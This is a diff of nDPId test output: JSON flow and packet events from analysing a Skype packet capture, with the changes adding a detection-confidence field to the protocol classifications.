+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXBhAAEAGzRzAqAEiR+4Hy8PaSU8uFQxlAAAAALAC\/\/8djQAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1183,41 +1182,41 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1431969774806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969774806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnFAAEAGyM7AqAEiTKehBsPcTzIA95PqAAAAALAC\/\/8TqQAAAgQFtAEDAwUBAQgKPiSNxwAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3061,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969776480,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9wNTHkCAPeT66AScSCe6QAAAgQFrAQCCAq+oc+oPiSNxwEDAwc="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3062,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969776480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo01NAAEAGuATAqAEiTKehBsPcTzIA95PrAAAAAFAEAABYdwAA"}
-00595{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00616{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00642{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
